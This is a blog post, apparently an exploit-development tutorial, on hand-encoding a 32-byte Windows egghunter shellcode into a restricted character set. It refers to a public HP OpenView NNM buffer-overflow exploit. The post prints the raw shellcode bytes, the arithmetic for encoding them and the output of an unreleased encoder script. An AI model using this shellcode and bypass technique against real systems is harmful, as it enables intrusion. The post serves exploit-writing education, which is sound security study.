Manual Egghunter/Shellcode Encoding using Python

You are probably wondering what this post is all about, well….it’s about manually encoding egghunter shellcode

why would you want to manually encode the shellcode if you have built in encoders in the metasploit framework ?

Before we begin have a look at the following exploit by muts : HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit

I wont go into much details about the process because most of it already been discussed on the Offensive Security HP NNM 0day Presentation , and on the Peter Van Eeckhoutte’s BlogExploit writing tutorial part 8 : Win32 Egg Hunting at the “Hand-crafting the encoder” and “Seeing this code run and reproduce the original egghunter is nice, but how can you build your own decoder ? “ sections of the tutorial.

What  I’m about to show here  is the calculations made in order for our shellcode to be bad chars free, well, doing it manually can can be a pain….

Due to large amount of bad characters we need to manually encode the egghunter using a limited allowed set of chars, using python we can have a script  doing the calculations for us.

again, I assume you watched the offsec video and read  the tutorials and already know what we are about to do here.

Detailed  information about egghunters can be found in this document by skape :

http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

1. Get the egghunter source code here: http://www.hick.org/code/skape/shellcode/win32/

or get them compiled to binaries here:

Egghunter
Title: Egghunter (1384 clicks)
Caption: Compiled Egg
Filename: egghunt.exe
Size: 52 kB
egghunt_syscall
Title: egghunt_syscall (1271 clicks)
Caption: Compiled syscall egg
Filename: egghunt_syscall.exe
Size: 52 kB

2. Generate the egghunter shellcode

C:\>egghunt.exe cstyle 0x57303054
// 32 byte egghunt shellcode (egg=0x57303054)
unsigned char egghunt[] = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xe\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

3. breaking down our 32 byte egghunter shellcode  into 8 sets of 4 bytes

"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30"
"\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7"

4. We will use the following value as an example:

"\x0f\x42\x52\x6a"

0xFFFFFFFF – 0x6a52420f + 1 = 0x95ADBDF1

We need to find three numbers (from the  allowed character set) which when added, will give  0x95ADBDF1

Instead of calculating this manually  we will use a custom made python script

Now lets split it in two: 95AD, BDF1 and feed these values into our script:

* The script contains a list of allowed chras and will use it for its calculations

exploit~#python encoder.py
Usage: encoder.py <hex value>
exploit~#python encoder.py 95AD
Got It!!
0x7f7f 0x152d 0x0101
exploit~#python encoder.py BDF1
Got It!!
0x7f7f 0x3d71 0x0101
7f7f7f7f
152d3d71
01010101

Let’s add our results and viola, we now have values made from the allowed char set only:

7f7f7f7f + 152d3d71 + 01010101 = 0x95ADBDF1

Shellcode Encoding Using Python from exploit on Vimeo.

*** Special Thanks to:  shatun for helping me by translating my needs into code ***

Post to Twitter

2 Comments


  1. shellc0d3
    Oct 05, 2010

    Where can I find the encoder.py?


  2. NightRanger
    Oct 06, 2010

    Sorry the script is not available for downloading.

Recent Posts